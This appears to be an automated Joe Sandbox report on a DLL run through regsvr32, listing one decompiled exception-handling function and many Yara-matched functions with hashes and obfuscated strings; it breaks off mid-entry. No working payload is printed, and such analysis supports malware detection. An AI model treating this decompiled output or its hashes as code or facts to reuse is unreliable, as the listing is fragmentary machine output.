                                                                                            			E000000011800082EC(void* __ecx, intOrPtr __edx, long long __rbx, long long __rsi) {
				void* _t36;
				int _t38;
				signed long long _t60;
				long long _t63;
				_Unknown_base(*)()* _t82;
				void* _t86;
				void* _t87;
				void* _t89;
				signed long long _t90;
				struct _EXCEPTION_POINTERS* _t95;

				 *((long long*)(_t89 + 0x10)) = __rbx;
				 *((long long*)(_t89 + 0x18)) = __rsi;
				_t87 = _t89 - 0x4f0;
				_t90 = _t89 - 0x5f0;
				_t60 =  *0x80021010; // 0x5e1a320b5ccd
				 *(_t87 + 0x4e0) = _t60 ^ _t90;
				if (__ecx == 0xffffffff) goto 0x8000832b;
				E00000001180001C40(_t36);
				r8d = 0x98;
				E00000001180002680();
				r8d = 0x4d0;
				E00000001180002680();
				 *((long long*)(_t90 + 0x48)) = _t90 + 0x70;
				_t63 = _t87 + 0x10;
				 *((long long*)(_t90 + 0x50)) = _t63;
				__imp__RtlCaptureContext();
				r8d = 0;
				__imp__RtlLookupFunctionEntry();
				if (_t63 == 0) goto 0x800083be;
				 *(_t90 + 0x38) =  *(_t90 + 0x38) & 0x00000000;
				 *((long long*)(_t90 + 0x30)) = _t90 + 0x58;
				 *((long long*)(_t90 + 0x28)) = _t90 + 0x60;
				 *((long long*)(_t90 + 0x20)) = _t87 + 0x10;
				__imp__RtlVirtualUnwind();
				 *((long long*)(_t87 + 0x108)) =  *((intOrPtr*)(_t87 + 0x508));
				 *((intOrPtr*)(_t90 + 0x70)) = __edx;
				 *((long long*)(_t87 + 0xa8)) = _t87 + 0x510;
				 *((long long*)(_t87 - 0x80)) =  *((intOrPtr*)(_t87 + 0x508));
				 *((intOrPtr*)(_t90 + 0x74)) = r8d;
				_t38 = IsDebuggerPresent();
				SetUnhandledExceptionFilter(_t82, _t86);
				if (UnhandledExceptionFilter(_t95) != 0) goto 0x80008420;
				if (_t38 != 0) goto 0x80008420;
				if (__ecx == 0xffffffff) goto 0x80008420;
				return E000000011800010B0(E00000001180001C40(_t40), __ecx,  *(_t87 + 0x4e0) ^ _t90);
			}













                                                                                            0x1800082ec
                                                                                            0x1800082f1
                                                                                            0x1800082fa
                                                                                            0x180008302
                                                                                            0x180008309
                                                                                            0x180008313
                                                                                            0x180008324
                                                                                            0x180008326
                                                                                            0x180008332
                                                                                            0x180008338
                                                                                            0x180008343
                                                                                            0x180008349
                                                                                            0x180008353
                                                                                            0x18000835c
                                                                                            0x180008360
                                                                                            0x180008365
                                                                                            0x18000837a
                                                                                            0x18000837d
                                                                                            0x180008386
                                                                                            0x180008388
                                                                                            0x18000839b
                                                                                            0x1800083a8
                                                                                            0x1800083b1
                                                                                            0x1800083b8
                                                                                            0x1800083c5
                                                                                            0x1800083d7
                                                                                            0x1800083db
                                                                                            0x1800083e9
                                                                                            0x1800083ed
                                                                                            0x1800083f1
                                                                                            0x1800083fb
                                                                                            0x18000840e
                                                                                            0x180008412
                                                                                            0x180008417
                                                                                            0x180008446

                                                                                            APIs
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.1503065831.0000000180001000.00000020.00000001.01000000.00000009.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                            • Associated: 00000003.00000002.1503047740.0000000180000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.1503280957.0000000180016000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.1503336725.0000000180021000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.1503366391.0000000180023000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_180000000_regsvr32.jbxd
                                                                                            Similarity
                                                                                            • API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
                                                                                            • String ID:
                                                                                            • API String ID: 1239891234-0
                                                                                            • Opcode ID: d0fc5085bf44c4937be082645d9f0fd030d92464e7166f1adeb9fe9a04ad5cc9
                                                                                            • Instruction ID: d6e40695d6015e5c843dff92317e70983bbd332ebd8c23179410134a75d63e3d
                                                                                            • Opcode Fuzzy Hash: d0fc5085bf44c4937be082645d9f0fd030d92464e7166f1adeb9fe9a04ad5cc9
                                                                                            • Instruction Fuzzy Hash: 7E315032604F8486DBA1CF25E8407DE73A4F788798F544116FA9D43B59DF38C259CB00
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 0073F8C4 Relevance: 6.6, Strings: 5, Instructions: 393COMMON
                                                                                            Download Yara Rule
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.1502600709.0000000000731000.00000020.00001000.00020000.00000000.sdmp, Offset: 00731000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_731000_regsvr32.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: G]W2$Uf$Wlw$X2D7$n
                                                                                            • API String ID: 0-182303197
                                                                                            • Opcode ID: 5ce9af85c0101b92db01bf743a5277ddb3699d4210e4094ad3775c6a215530db
                                                                                            • Instruction ID: 9984afed70627d21907dd1263aa047c6166e6b47c9f69a9bca82ffd6eda7c556
                                                                                            • Opcode Fuzzy Hash: 5ce9af85c0101b92db01bf743a5277ddb3699d4210e4094ad3775c6a215530db
                                                                                            • Instruction Fuzzy Hash: D4121770A04709EFDB58DF68C18A99EBBF1FF44344F40816DE84AAB250D775DA18CB85
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 00745384 Relevance: 6.6, Strings: 5, Instructions: 313COMMON
                                                                                            Download Yara Rule
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.1502600709.0000000000731000.00000020.00001000.00020000.00000000.sdmp, Offset: 00731000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_731000_regsvr32.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: GK$M/uB$Q|-$~~K$Bt$
                                                                                            • API String ID: 0-557373213
                                                                                            • Opcode ID: 5399f6d2f4ddd76430553fcbb3a69801bb23c4fdd32863c07da465c7968e24a8
                                                                                            • Instruction ID: ecf3e3a59dc29732202d4f16f48361c2fe5869cf0ba5be7c0a6d11a15a0d2d43
                                                                                            • Opcode Fuzzy Hash: 5399f6d2f4ddd76430553fcbb3a69801bb23c4fdd32863c07da465c7968e24a8
                                                                                            • Instruction Fuzzy Hash: 9FE1027550160CCBDF68DF38C0994D93BE1FF58308F611229FC66A62A2DB78D914CB49
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 00738378 Relevance: 6.5, Strings: 5, Instructions: 238COMMON
                                                                                            Download Yara Rule
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.1502600709.0000000000731000.00000020.00001000.00020000.00000000.sdmp, Offset: 00731000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_731000_regsvr32.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: .I$gBfh$i[$w|${
                                                                                            • API String ID: 0-448909954
                                                                                            • Opcode ID: fd252399347da21463b78aeaa0d34fc6630a10d5928b5024a52fe33a2729c415
                                                                                            • Instruction ID: c4214fb8048abdf002e1a188c2d6409d538264dab7df93c915a10c7ec89c2e74
                                                                                            • Opcode Fuzzy Hash: fd252399347da21463b78aeaa0d34fc6630a10d5928b5024a52fe33a2729c415
                                                                                            • Instruction Fuzzy Hash: 96B13670D207499FDB88DFA9D8898DDBBF0FB48304F40921DE816AB251C778A945CF95
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 0074610C Relevance: 6.5, Strings: 5, Instructions: 208COMMON
                                                                                            Download Yara Rule
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.1502600709.0000000000731000.00000020.00001000.00020000.00000000.sdmp, Offset: 00731000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_731000_regsvr32.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: cp$vm$x$zu$Kn#
                                                                                            • API String ID: 0-3521309225
                                                                                            • Opcode ID: 854233274bfaeff89ac29a935d156dc1944753dcbd55c44e864b2476cdfcfe8d
                                                                                            • Instruction ID: 72927976356e983b2635bbee8661be541b779410aa818ab73a461cb71620afcc
                                                                                            • Opcode Fuzzy Hash: 854233274bfaeff89ac29a935d156dc1944753dcbd55c44e864b2476cdfcfe8d
                                                                                            • Instruction Fuzzy Hash: CFA103B0D143198FDB58CFA9D8898DEBBF0FB48314F108219E855B7290D3789945CF95
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 00747518 Relevance: 6.3, Strings: 5, Instructions: 87COMMON
                                                                                            Download Yara Rule
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.1502600709.0000000000731000.00000020.00001000.00020000.00000000.sdmp, Offset: 00731000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_731000_regsvr32.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: #0FQ$0T$C;$lXjD$tS
                                                                                            • API String ID: 0-817034907
                                                                                            • Opcode ID: e4bf78acd7a5f6a30f384b9d32d43fdeffbe4641104b903a1cc162fefd21facd
                                                                                            • Instruction ID: abc6076ac56165a40d43ed5845e73bd6f5a4d9e38231b422d2b648600362f177
                                                                                            • Opcode Fuzzy Hash: e4bf78acd7a5f6a30f384b9d32d43fdeffbe4641104b903a1cc162fefd21facd
                                                                                            • Instruction Fuzzy Hash: C44192B180034E8FDB44DF64D88A4CE7FF0FB68398F215619E859A6250D3B89694CFD5
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 0073975C Relevance: 6.3, Strings: 5, Instructions: 77COMMON
                                                                                            Download Yara Rule
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.1502600709.0000000000731000.00000020.00001000.00020000.00000000.sdmp, Offset: 00731000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_731000_regsvr32.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: ,$3T$D-$Rc$l
                                                                                            • API String ID: 0-617906138
                                                                                            • Opcode ID: 3a3cf95294224deb7faeda9f3e638283c88744c906ce2ff68bf076d4943cea68
                                                                                            • Instruction ID: 6d49e016ba36e6f6ff1730be1c34d74f2ab854c8dcd8869f83b43b012f4fab05
                                                                                            • Opcode Fuzzy Hash: 3a3cf95294224deb7faeda9f3e638283c88744c906ce2ff68bf076d4943cea68
                                                                                            • Instruction Fuzzy Hash: B641D5B081078E8FDB44CF64D88A4DE7BF0FB58358F104619E869A6260D3B89668CF95
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 0000000180001D98 Relevance: 6.0, APIs: 4, Instructions: 39timethreadCOMMONLIBRARYCODE
                                                                                            Download Yara Rule
                                                                                            C-Code - Quality: 100%
                                                                                            			E00000001180001D98(long long __rbx, long long _a32) {

				_a32 = __rbx;
			}



                                                                                            0x180001d98

                                                                                            APIs
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.1503065831.0000000180001000.00000020.00000001.01000000.00000009.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                            • Associated: 00000003.00000002.1503047740.0000000180000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.1503280957.0000000180016000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.1503336725.0000000180021000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.1503366391.0000000180023000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_180000000_regsvr32.jbxd
                                                                                            Similarity
                                                                                            • API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
                                                                                            • String ID:
                                                                                            • API String ID: 2933794660-0
                                                                                            • Opcode ID: 435d845f9f5cdf73bfe4695b71b0048b28e79a424c4651dbd907605b843c4427
                                                                                            • Instruction ID: 8b5b8807919832646eb0d744692d73e0514a3f66bd27872d13ad1b0d2e18aa1e
                                                                                            • Opcode Fuzzy Hash: 435d845f9f5cdf73bfe4695b71b0048b28e79a424c4651dbd907605b843c4427
                                                                                            • Instruction Fuzzy Hash: E6113C32600F449AEB52CF61EC943D833A4F31D799F041A25FAAD477A4DF78C2A88340
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 0074CF70 Relevance: 5.4, Strings: 4, Instructions: 410COMMON
                                                                                            Download Yara Rule
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.1502600709.0000000000731000.00000020.00001000.00020000.00000000.sdmp, Offset: 00731000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_731000_regsvr32.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: #X$ $UCV$y4.)
                                                                                            • API String ID: 0-917551206
                                                                                            • Opcode ID: 28325ea241be474c5b5558c29b1591e9c0afa6bd6a02919fad3fbb937fa4a7d1
                                                                                            • Instruction ID: be0444f89f85d4aeeb64db146e1305562bc191515f28a4cc7ac981ab9fc919c4
                                                                                            • Opcode Fuzzy Hash: 28325ea241be474c5b5558c29b1591e9c0afa6bd6a02919fad3fbb937fa4a7d1
                                                                                            • Instruction Fuzzy Hash: 8512E4B1A0470D9FDB58DFA8E08A4DDBBF2FB48344F00412DE946A7290D7B9D819CB95
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 00734EB8 Relevance: 5.4, Strings: 4, Instructions: 386COMMON
                                                                                            Download Yara Rule
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.1502600709.0000000000731000.00000020.00001000.00020000.00000000.sdmp, Offset: 00731000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_731000_regsvr32.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: #X$rq%$tL>$".
                                                                                            • API String ID: 0-3922733902
                                                                                            • Opcode ID: e7bca3236e2c6002a46b032ca93679f7d95ede6d4010d0837b1e0abab37f6438
                                                                                            • Instruction ID: 0c9e683c7d2b6fa3a9a7d776b2486a085bebdd9bfd2396ebf6708486ae6fe575
                                                                                            • Opcode Fuzzy Hash: e7bca3236e2c6002a46b032ca93679f7d95ede6d4010d0837b1e0abab37f6438
                                                                                            • Instruction Fuzzy Hash: E122CF719097C88BDBF8DF24C8896DD37F0FF48344F90125A984E9A694DBB86684CF42
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 0074AD28 Relevance: 5.2, Strings: 4, Instructions: 205COMMON
                                                                                            Download Yara Rule
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.1502600709.0000000000731000.00000020.00001000.00020000.00000000.sdmp, Offset: 00731000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_731000_regsvr32.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: g$-$HE$Vc
                                                                                            • API String ID: 0-2562162751
                                                                                            • Opcode ID: f3d5559af2bde6194e80210adddbbaf8e95cb0bc6a16661ffa1dd3a57d8e1344
                                                                                            • Instruction ID: 271b9e8b3a9d91f8c300b8da7f6817549a3ef6c49e066abf463dbb53c9312d71
                                                                                            • Opcode Fuzzy Hash: f3d5559af2bde6194e80210adddbbaf8e95cb0bc6a16661ffa1dd3a57d8e1344
                                                                                            • Instruction Fuzzy Hash: ADA1D1B150478C9FDB88CF28D88A4CD3BB2FB58398F505219FC4A97260D7B8D985CB85
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 007380CC Relevance: 5.2, Strings: 4, Instructions: 163COMMON
                                                                                            Download Yara Rule
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.1502600709.0000000000731000.00000020.00001000.00020000.00000000.sdmp, Offset: 00731000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_731000_regsvr32.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: (;$*i$he$*%
                                                                                            • API String ID: 0-35414758
                                                                                            • Opcode ID: 8b9c9bfbfb1498278ba2aeeef8e78c7341b02e7a1b6eacef6973ad54d80d413a
                                                                                            • Instruction ID: ca7afd2796b854a03b4d4f13d9afec1787b4fa95774ca1f5cbfe4df767fcd640
                                                                                            • Opcode Fuzzy Hash: 8b9c9bfbfb1498278ba2aeeef8e78c7341b02e7a1b6eacef6973ad54d80d413a
                                                                                            • Instruction Fuzzy Hash: AC711A70514748DBEF88CF28C8895DD3BA1FB48358F565319FC4AA6290D778D484CB89
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 0073D474 Relevance: 5.1, Strings: 4, Instructions: 136COMMON
                                                                                            Download Yara Rule
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.1502600709.0000000000731000.00000020.00001000.00020000.00000000.sdmp, Offset: 00731000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_731000_regsvr32.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: */$I$Yu$(
                                                                                            • API String ID: 0-674225443
                                                                                            • Opcode ID: 2498b6af7a2ed30e90db0a3e12568d2f4136c2386795e8cd742b44945e36b51d
                                                                                            • Instruction ID: a295da282c58d0f45a3c2008693f04ed7c48c3b342830e2f20272594f80479fb
                                                                                            • Opcode Fuzzy Hash: 2498b6af7a2ed30e90db0a3e12568d2f4136c2386795e8cd742b44945e36b51d
                                                                                            • Instruction Fuzzy Hash: 72718DB190070ACFDB58CF68D48A5DE7FB0FB68398F204219F85596260D7B49AA5CFC4
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 007314D4 Relevance: 5.1, Strings: 4, Instructions: 117COMMON
                                                                                            Download Yara Rule
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.1502600709.0000000000731000.00000020.00001000.00020000.00000000.sdmp, Offset: 00731000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_731000_regsvr32.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: #X$.:$PYq|$W
                                                                                            • API String ID: 0-626586655
                                                                                            • Opcode ID: 21991bcfd0f912b097b6461d75a60c549d6ff57ca2b273beb0e746897d976d77
                                                                                            • Instruction ID: 9accd9b29948f2ba704f0ef6b43165ebc28eba98451dd88659277c166b7bda7d
                                                                                            • Opcode Fuzzy Hash: 21991bcfd0f912b097b6461d75a60c549d6ff57ca2b273beb0e746897d976d77
                                                                                            • Instruction Fuzzy Hash: 7841E37061CB858FD7A8DF28D58A65BBBF0FBD9704F804A1EF589C7250DB7998048B42
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 0073A660 Relevance: 5.1, Strings: 4, Instructions: 101COMMON
                                                                                            Download Yara Rule
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.1502600709.0000000000731000.00000020.00001000.00020000.00000000.sdmp, Offset: 00731000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_731000_regsvr32.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: 5`$<ml$a:$P
                                                                                            • API String ID: 0-330785107
                                                                                            • Opcode ID: cbd383124c860a9d8e400423fa4c9196148af7f7093da0234d577b407377b911
                                                                                            • Instruction ID: 3800f61d0189c0f3ba110cd30ce8afb42e3c81808e94467df65051d480e4e5d0
                                                                                            • Opcode Fuzzy Hash: cbd383124c860a9d8e400423fa4c9196148af7f7093da0234d577b407377b911
                                                                                            • Instruction Fuzzy Hash: C941F4B190074E8BDB4CDF68C48A49E7FB1FB58348F10861DE8569A390E7B89664CFC5
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 00744A90 Relevance: 5.1, Strings: 4, Instructions: 101COMMON
                                                                                            Download Yara Rule
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.1502600709.0000000000731000.00000020.00001000.00020000.00000000.sdmp, Offset: 00731000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_731000_regsvr32.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: -+$0u$S$e!
                                                                                            • API String ID: 0-4217091389
                                                                                            • Opcode ID: 96b86808421bf99806c252c8d8da0d71d9c96e1238819cdefd32f8fbf4f8ccc7
                                                                                            • Instruction ID: 21333cb55570fba61ead478d555be2cf97ee8d0bb5591760fdc2d1cb1a8e7c11
                                                                                            • Opcode Fuzzy Hash: 96b86808421bf99806c252c8d8da0d71d9c96e1238819cdefd32f8fbf4f8ccc7
                                                                                            • Instruction Fuzzy Hash: 4441E3B090474A8FDB48DF64C89A5DE7FF0FB68388F20461DF81AA6250D37496A4CBD5
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 00733274 Relevance: 5.1, Strings: 4, Instructions: 81COMMON
                                                                                            Download Yara Rule
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.1502600709.0000000000731000.00000020.00001000.00020000.00000000.sdmp, Offset: 00731000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_731000_regsvr32.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: o$"B$SJ$wU
                                                                                            • API String ID: 0-691100934
                                                                                            • Opcode ID: aed5e06b6c4a71d08a3525650badbc70dff16501ab02106ea58e4e5589b648c2
                                                                                            • Instruction ID: f8ebb9d09f118da40760ec4d0a0c81fef07765976798fe6f718a46ae72584cff
                                                                                            • Opcode Fuzzy Hash: aed5e06b6c4a71d08a3525650badbc70dff16501ab02106ea58e4e5589b648c2
                                                                                            • Instruction Fuzzy Hash: 8E41E0B180078ECFDB48CF68C88A5DEBBF0FB58358F104619E859A6254D3B89695CFC5
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 00731B94 Relevance: 5.1, Strings: 4, Instructions: 77COMMON
                                                                                            Download Yara Rule
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.1502600709.0000000000731000.00000020.00001000.00020000.00000000.sdmp, Offset: 00731000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_731000_regsvr32.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: 9luJ$=2y}$=2y}$b
                                                                                            • API String ID: 0-1667874806
                                                                                            • Opcode ID: d458d9c607de17fbdbefdb2618156754051a2d24e7c6e7f69b2615133eee77d7
                                                                                            • Instruction ID: 8a2c245cd1d33ff3e49584b9ba65031cf653155a1ac17c846e1eb5cb28c52a06
                                                                                            • Opcode Fuzzy Hash: d458d9c607de17fbdbefdb2618156754051a2d24e7c6e7f69b2615133eee77d7
                                                                                            • Instruction Fuzzy Hash: E241D6B181038EDFDF44CF64D88A4CE7BB0FB18358F110A19F865A62A4D3B89665CF85
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 007348FC Relevance: 4.0, Strings: 3, Instructions: 225COMMON
                                                                                            Download Yara Rule
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.1502600709.0000000000731000.00000020.00001000.00020000.00000000.sdmp, Offset: 00731000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_731000_regsvr32.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: ;$O,$fdu
                                                                                            • API String ID: 0-1721916326
                                                                                            • Opcode ID: 85396711fe01e2282415cffc97d2cae76b85543eafba1fee15bed9e01615747c
                                                                                            • Instruction ID: 41fd30cfdef22359591c661e631470774039f0396d910ecd634da2f607cae6fc
                                                                                            • Opcode Fuzzy Hash: 85396711fe01e2282415cffc97d2cae76b85543eafba1fee15bed9e01615747c
                                                                                            • Instruction Fuzzy Hash: 23A10371D14718EBDB5CDFA8E8C999EBBB1FB54314F00421AE806A72A1CB78A945CF41
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 00733E0C Relevance: 3.9, Strings: 3, Instructions: 171COMMON
                                                                                            Download Yara Rule
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.1502600709.0000000000731000.00000020.00001000.00020000.00000000.sdmp, Offset: 00731000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_731000_regsvr32.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: u$&v$f
                                                                                            • API String ID: 0-1868853588
                                                                                            • Opcode ID: 4a0e0bcf9159e8ed5db1efbd4fd836488bb382803c7d1313d4c59486869e04d2
                                                                                            • Instruction ID: ab88caf7bb86d76a1e0afcd148e09488b7f343faccb6e9dc348cc2a3ba839a7f
                                                                                            • Opcode Fuzzy Hash: 4a0e0bcf9159e8ed5db1efbd4fd836488bb382803c7d1313d4c59486869e04d2
                                                                                            • Instruction Fuzzy Hash: C3713471D04709EBDB1CDFA8E5C919DBBB1FB44314F10412DE416A72A1CB789945CF81
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 0074E750 Relevance: 3.9, Strings: 3, Instructions: 145COMMON
                                                                                            Download Yara Rule
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.1502600709.0000000000731000.00000020.00001000.00020000.00000000.sdmp, Offset: 00731000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_731000_regsvr32.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: o$j$t
                                                                                            • API String ID: 0-2067604139
                                                                                            • Opcode ID: 113b91994dddf0efa674f36996042e856a8803c02bc6c37f7aa57fbd8228378e
                                                                                            • Instruction ID: 8d88195890027ef21b502b0be079548475bed57d8a4e69fcacc8c54fda8909b1
                                                                                            • Opcode Fuzzy Hash: 113b91994dddf0efa674f36996042e856a8803c02bc6c37f7aa57fbd8228378e
                                                                                            • Instruction Fuzzy Hash: 0F61EF705087848BD768DF28C18A55FBBF1FBC6704F104A1DE68A9B2A0D77AD844CB43
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 0074D5F0 Relevance: 3.8, Strings: 3, Instructions: 96COMMON
                                                                                            Download Yara Rule
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.1502600709.0000000000731000.00000020.00001000.00020000.00000000.sdmp, Offset: 00731000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_731000_regsvr32.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: P$KGRa$wy
                                                                                            • API String ID: 0-4077564265
                                                                                            • Opcode ID: d053b19ec2bcb7975f54130f0bec91227afaf154fd553d0fa3630ba3df2317cc
                                                                                            • Instruction ID: e67063a49b9a6773debea9c56a07d7d9f7750ca38b8f4544f15262a293e21417
                                                                                            • Opcode Fuzzy Hash: d053b19ec2bcb7975f54130f0bec91227afaf154fd553d0fa3630ba3df2317cc
                                                                                            • Instruction Fuzzy Hash: F241C0B090074A8BDF48CF68C8865DE7FB0FB68348F51461DE84AA6290D37896A4CFC4
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 00748BB8 Relevance: 3.8, Strings: 3, Instructions: 96COMMON
                                                                                            Download Yara Rule
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.1502600709.0000000000731000.00000020.00001000.00020000.00000000.sdmp, Offset: 00731000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_731000_regsvr32.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: =$N@`Y$`Y
                                                                                            • API String ID: 0-2183226064
                                                                                            • Opcode ID: d2df9a4b86a3a0f31adfb1a7bc02e0a1df19d01470a0e79ca81506aab5c400ca
